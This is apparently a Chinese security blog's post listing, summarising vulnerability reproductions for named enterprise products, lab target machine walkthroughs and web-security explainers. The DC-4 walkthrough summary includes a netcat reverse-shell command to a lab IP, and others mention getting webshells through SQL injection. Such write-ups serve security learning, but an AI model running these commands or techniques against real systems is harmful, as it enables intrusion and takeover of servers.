- 博客(51)
- 收藏
- 关注
RSS订阅原创 【CVE-2025-30208】| Vite-漏洞分析与复现
漏洞简介漏洞简介CVE-2025-30208 是 Vite 开发服务器中的一个任意文件读取漏洞。该漏洞允许攻击者通过特定的 URL 参数绕过访问控制,从而读取服务器上的敏感文件(如或。
2025-03-28 21:50:48
2486
原创 windows_kali渗透集成系统
原作者(makoto56)本项目制作的初衷是帮助渗透新手快速搭建工作环境,工欲善其事,必先利其器。下载可选解压后打开 vmx 文件即用。
2025-01-24 17:04:00
289
原创 那些年搭建过的靶场?NO(×)一键部署(√)最全整理,你都打过嘛?
截止目前以上都是本人使用过的,当然使用搜索引擎(fofa...)可以白嫖,但是我想大家都是小白走过来的,用pikachu师傅的一句话就是:"少就是多,慢就是快"。希望本文能帮助到大家。当前还有很多开源的优秀靶场,下面大家可以研究哈,一起交流学习~师傅们可以进交流群,一块学习哈~
2024-12-15 08:00:00
985
原创 RELE-GL针对于规则的文本过滤
比如攻防的时候遇到了批量的IP需要处理,也就当时简单的整个脚本处理下,事后脚本就扔了,下次在用了在整一个,就这样一直重复....还有就是src有时候对于资产的导出,有些.g*v,对于脚本小子肯定是要绕开的,手动摘除非常慢,效率不高,别问,问就是... 所以就萌生了这个,总的说,逻辑不难,有很多注释还都是中文的,懂的都懂,想要进一步做优化或者完善补充的随意发挥,源码都有。
2024-12-14 07:30:00
515
原创 【漏洞复现】|圣乔ERP系统login.action存在Struts2远程代码执行漏洞
圣乔ERP系统是杭州圣乔科技有限公司开发的一款企业级管理软件,旨在为企业提供一套全面、集成化的管理解决方案,帮助企业实现资源的优化配置和高效利用。该系统集成了财务、人力资源、生产、销售、供应链等多个业务模块,实现了企业内外部信息的无缝连接和实时共享。适用于各种规模的企业,特别是需要实现资源优化配置、提高运营效率和管理水平的企业。它可以帮助企业解决传统管理方式中存在的信息孤岛、数据重复输入、信息传递滞后等问题,提高企业的整体竞争力。
2024-12-13 21:05:34
484
原创 【漏洞复现】|用友U8-CRM接口rellistname.php存在SQL注入漏洞
用友U8+CRM /config/rellistname.php 文件多个方法存在SQL注入漏洞,未经身份验证的攻击者通过漏洞执行任意SQL语句。
2024-12-12 11:30:00
263
原创 【漏洞复现】|YourPHPCMS系统Register_checkEmail存在sql注入
Yourphp 企业网站是一款完全开源免费的PHP MYSQL系统.核心采用了Thinkphp框架等众多开源软件,同时核心功能也作为开源软件发布的网站后台。
2024-12-10 06:00:00
360
原创 【漏洞复现】|YourPHPCMS系统login_checkEmail存在sql注入
Yourphp 企业网站是一款完全开源免费的PHP MYSQL系统.核心采用了Thinkphp框架等众多开源软件,同时核心功能也作为开源软件发布的网站后台。
2024-12-09 11:00:00
545
原创 【漏洞复现】|用友U8-CRM系统ajaxgetborrowdata.php存在SQL注入漏洞
用友U8-CRM系统ajaxgetborrowdata.php存在SQL注入漏洞,文件多个方法存在SQL注入漏洞,未经身份验证的攻击者通过漏洞执行任意SQL语句,调用xp_cmdshell写入后门文件,执行任意代码,从而获取到服务器权限。
2024-12-08 10:15:00
417
原创 【漏洞复现】|Apache-HertzBeat开源实时监控系统存在默认口令
HertzBeat(赫兹跳动) 是一个开源实时监控系统,无需Agent,性能集群,兼容Prometheus,自定义监控和状态页构建能力。HertzBeat 的强大自定义,多类型支持,高性能,易扩展,希望能帮助用户快速构建自有监控系统。传播或利用本文及相关工具所导致的任何直接或间接后果,包括法律责任和不良影响,均由使用者自行承担,文章作者概不负责。如内容涉及侵权问题,请及时联系,作者将迅速处理并致以歉意。此外,工具来源于网络,安全性需用户自行验证。
2024-12-07 19:46:47
533
原创 【漏洞复现】|任子行网络安全审计系统log_fw_ips_scan_jsondata接口存在SQL注入
任子行网络安全审计系统SURF-SA系列产品是任子行为各行业提供的自主可控信息化办公环境上网行为审计的安全服务。任子行网络安全审计系统 log_fw_ips_scan_jsondata 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
2024-11-27 06:15:00
371
原创 【漏洞复现】|用友NC /process接口SQL注入漏洞
文章及相关内容仅限于合法合规的安全研究与技术学习用途。任何用户因将工具或相关信息用于其他用途而引发的法律后果或连带责任,均由使用者自行承担,作者及发布者对此不承担任何形式的法律责任或连带责任。本文仅分享来源于公开渠道的漏洞 POC,旨在促进学术研究与技术交流,不对因信息使用而导致的任何直接或间接后果、损失或风险承担责任。如本内容存在侵犯他人合法权益的情形,请立即与作者联系,作者将尽快采取必要措施予以删除并致以歉意。
2024-11-26 18:45:00
577
原创 【漏洞复现】|爱数AnyShare智能内容管理平台Usrm_GetAllUsers信息泄露漏洞
上海爱数信息技术股份有限公司自主研发的 AnyShare智能内容管理平台是一款软硬件一体化产品,主要面向企业级用户,提供非结构化数据管理方案。AnyShare基于私有云存储,为移动办公、桌面虚拟化、BYOD(自带设备办公)的客户提供私有文档云解决方案,旨在打造组织的统一文档平台。它不仅能够实现海量非结构化数据的存储和管理,还支持多终端同步、实时共享、多人在线编辑等功能,极大提升了团队协作效率和数据安全性。
2024-11-25 20:30:00
986
原创 【漏洞复现】|百易云资产管理运营系统/mobilefront/c/2.php前台文件上传
湖南众合百易信息技术有限公司(简称:百易云)成立于2017年是一家专注于不动产领域数字化研发及服务的国家高新技术企业,公司拥有不动产领域的数字化全面解决方案、覆盖住宅、写字楼、商业中心、专业市场、产业园区、公建、后勤等多种业态、通过数字化帮助企业实现数字化转型,有效提高公司管理水平及业务办理效率、降低运营成本,公司自成立以来,已帮助众多企业实现数字化转型。资产管理运营系统/mobilefront/c/2.php前台文件上传漏洞。
2024-11-25 17:20:28
652
原创 【漏洞复现】|万能门店小程序系统_requestPost存在任意文件读取
万能门店微信小程序不限制小程序生成数量,支持多页面,预约功能等。本套源码包含多商户插件、点餐插件、拼团插件、积分兑换、小程序手机客服等全套十个插件模块。支持后台一键扫码上传小程序,和后台通用模板。微信万能门店小程序系统存在任意文件读取漏洞。
2024-11-25 10:30:00
402
原创 【漏洞复现】|索贝融媒体search存在SQL注入漏洞
索贝融媒体产品是成都索贝数码科技股份有限公司(简称索贝)为各级电视台和媒体机构打造的一套集互联网和电视融合生产的解决方案。索贝融媒体 Sc-TaskMonitoring/rest/task/search 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 此漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
2024-11-25 06:00:00
535
原创 【漏洞复现】|SRM智联云采系统多个接口存在SQL注入漏洞
深圳)科技SRM智联云采系统针对企业供应链管理难题,及智能化转型升级需求,智联云采依托人工智能、物联网、大数据、云等技术,通过软硬件系统化方案,帮助企业实现供应商关系管理和采购线上化、移动化、智能化,提升采购和协同效率,进而规避供需风险,强化供应链整合能力,构建企业利益共同体。智互联SRM智联云采系统quickReceiptDetail存在SQL注入漏洞,攻击者可利用该漏洞获取敏感信息。
2024-11-24 19:14:45
622
原创 【漏洞复现】|致翔OA系统接口open_juese SQL注入漏洞
致翔科技由广州致翔计算机科技有限公司和深圳分公司以及各地还有多家办事处组成,是以IT软件技术和管理不断创新为核心的客户需求导向型的高新技术和双软认证软件技术公司。
2024-11-24 18:09:20
413
原创 【漏洞复现】|智互联SRM智联云采系统quickReceiptDetail SQL注入漏洞
深圳)科技有限公司SRM智联云采系统针对企业供应链管理难题,及智能化转型升级需求,智联云采依托人工智能、物联网、大数据、云等技术,通过软硬件系统化方案,帮助企业实现供应商关系管理和采购线上化、移动化、智能化,提升采购和协同效率,进而规避供需风险,强化供应链整合能力,构建企业利益共同体。智互联SRM智联云采系统quickReceiptDetail存在SQL注入漏洞,攻击者可利用该漏洞获取敏感信息。
2024-11-22 20:50:01
511
原创 【CVE-2024-48694】OfficeWeb365 SaveDraw
OfficeWeb365 SaveDraw 接口存在各种文件上传漏洞,攻击者通过漏洞可以在服务器中上传任意文件获取服务器权限。
2024-11-20 13:50:50
408
原创 【漏洞复现】|九思OA_dl.jsp任意文件读取
九思OA产品由北京九思协同软件有限公司(简称九思软件)开发,面向企事业单位和政府机关,致力于提供高端的协同办公解决方案,帮助客户实现信息化、数字化和智能化转型。通过融合多种管理思想与OA接口技术,九思OA帮助企业打破管理边界、整合信息孤岛,形成高效、规范、实时且低成本的管理环境,支持一体化的技术架构。该系统的dl.jsp接口存在任意文件读取漏洞,攻击者可通过该漏洞读取系统的重要文件(如数据库配置文件、系统配置文件等),导致网站安全性严重受损,暴露于更高的攻击风险。
2024-11-19 19:36:03
354
1
原创 【漏洞复现】|用友YonBIP yonbiplogin任意文件读取
用友YonBIP高级版yonbiplogin存在任意文件读取漏洞,攻击者可通过该漏洞获取敏感信息。
2024-11-19 16:46:45
1142
原创 靶机DC-4
nc -e /bin/bash 192.168.56.128 8086(nc+-e+/bin/bash+192.168.56.128+8086)空格用+号代替,也可以直接进行url编码。小结:用到的用户也就是jim和charles,要是前者能提权就省事了,不过靶机都是有提示,都是最后要提权,估计后面的靶机提权也不重样。去邮箱看到:/var/spool/mail 这里是前面提到的三个用户的:charles,以及给了密码:^xHhA&hvim0y。查看mbox的内容,看到有邮箱提示:来自root用户的信。
2024-07-17 00:21:24
424
原创 靶机DC-2
唯一有用的就只有vi(编辑器)这个命令,这里可以里用vi或者是BASH_CMDS设置shell来绕过rbash,然后再设置环境变量添加命令。已经升级为bash了,无法执行cat命令是因为环境变量的问题,用以下命令添加一下两条路径即可。后台登录地址,弱密码没爆破出来,结合上面的用 cewl生成字典。提示我们得su一下jerry,su是Linux切换用户的命令。得到flag4,提示git,还有root看来是要提权的操作。发现git能使用root的权限,这里有两种提权的姿势。爆破出了jerry和tom的密码。
2024-07-13 17:06:11
872
原创 红日(一)
拓扑图win7需要配置两张网卡,模拟内外网环境,充当跳板机外网网段:56内网网段:72目标拿下域控,2008,72.131,已经72.132。
2024-07-12 15:52:12
1046
1
原创 靶机DC-3
搭建可能出现的情况:第一次导入镜像失败,可以再次尝试若出现报错的情况,都能搜到攻略,在设置里边更改即可以上情况博主都遇到了,不过都能搜到攻略。
2024-07-09 21:13:53
431
原创 框架漏洞(后续补充)
CVE-2020-1957漏洞利用了Apache Shiro和Spring Boot对URL处理的差异性,攻击者可以构造特定的URL,绕过Shiro对Spring Boot中Servlet的权限控制,实现未授权的越权访问。Apache Log4j2的某些版本中,攻击者可通过JNDI注入执行远程代码。这通常涉及到恶意的日志消息,允许攻击者访问服务器上的资源。,将其忽略或错误处理为/admin/,Shiro的路径检查就会失效,允许未经授权的访问。-c是执行的bash命令,-A是指JNDI服务器IP。
2024-06-21 17:07:18
622
原创 XSS,CSRF,SSRF简述
http是一种无状态的协议,所以客户端每次发出请求时,下一次请求无法得知上一次请求所包含的状态数据,也就是说影响我们浏览资源的交互性体验变差。比如我们登录后台管理页面,当我们已经在登录状态下,每次在更换功能点就不用在每次都要进行登录。从而大大提升我们使用体验1、cookie数据存放在客户的浏览器上,session数据放在服务器上。2、cookie不是很安全,别人可以分析存放在本地的COOKIE并进行COOKIE欺骗 考虑到安全应当使用session。3、session会在一定时间内保存在服务器上。
2024-04-27 14:56:31
915
原创 SSRF简述
SSRF(Server-Side Request Forgery,服务端请求伪造)是一种安全漏洞,攻击者可以利用它来发送恶意请求,通常是从受信任的服务器端发起。攻击者利用这个漏洞可以访问服务器内部的资源、绕过防火墙、执行内部网络扫描、利用内部系统等假设有一个网站允许用户通过输入一个URL来获取远程服务器上的图片并显示在网页上。网站的后端处理用户的输入,然后从指定的URL下载图片并显示在网页上。
2024-04-27 14:33:36
548
原创 sql注入getshell
条件:web目录具有写的权限,能够使用单引号;知道网站绝对路径;secure_file_priv为空以sqli-labs举例,secure_file_priv的值默认是NULL(5.5之前默认是空的),则表示限制mysqId不允许导入以及导出在mysql/my.ini中查看是否有secure_file_priv参数,这里是没有的因此我们加上去:secure_flie_priv=''即可这里进行16进制转换,因此是0X开头,写入“
2024-04-17 22:57:03
817
1
原创 JavaScript简述
JavaScript 是一种轻量级的编程语言(PHP都是弱语言),改善用户界面和用户体验。运行在客户端(浏览器)。服务端编程node.js:Node.js 主要用于服务器端,用于构建服务器应用、API、后端服务等。,当然HTML和CSS属于标记语言,三者(框架+外观装饰+功能交互)构成我们熟知的前端界面,JS使得我们的交互有大大的帮助。JavaScript 插入 HTML 页面后,可由所有的现代浏览器执行。由两大部分组成ECMAScript:规定js基础语法核心知识。
2023-09-17 20:13:19
222
1
原创 Ubuntu安装vmtools,dokcer及换源
此时桌面有vmtoolsCD盘,双击打开盘,然后将文件复制到或者提取到你要存放文件的目录下。2、解压文件进入目录执行安装,这里输入yes使用默认安装路径只要出现路径的就按下回车,出现【Yes/No】全部选择Yes。出现安装成功,重启即可。
2023-06-05 18:25:12
308
原创 AWD模拟搭建
搭建Cardinal平台平台搭建环境:KaliDockermysqlCardina根据自己的操作系统选择,这里我的是第四个。
2023-05-12 18:06:41
1045
1
原创 web-php特性
Web89正则匹配,类型转换源码intval()函数用于获取变量的整数值这里主要是这个函数num))用正则表达式匹配输入值num,如果存在数字,则返回错误信息"no no no!并终止程序。这个函数是类型转换,也就是转为整形类型转换请移步因此num满足以上即可输出flag.phpnum[]=1。
2023-05-10 13:30:46
288
原创 PHP-数据类型
可空类型允许变量的值可以是特定类型或 null,而标量类型声明则要求函数或方法的参数或返回值必须是特定类型的标量值(例如整数、浮点数、布尔值或字符串),可以使用 int、float、bool、string 等关键字来声明。11.标量类型声明(Scalar Type Declarations):标量类型声明是 PHP 7 中引入的新特性,要求函数或方法的参数或返回值必须是特定类型的标量值,可以使用 int、float、bool、string 等关键字来声明。在 PHP 中,布尔型通常用于条件判断和逻辑运算。
2023-05-01 00:00:15
210
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人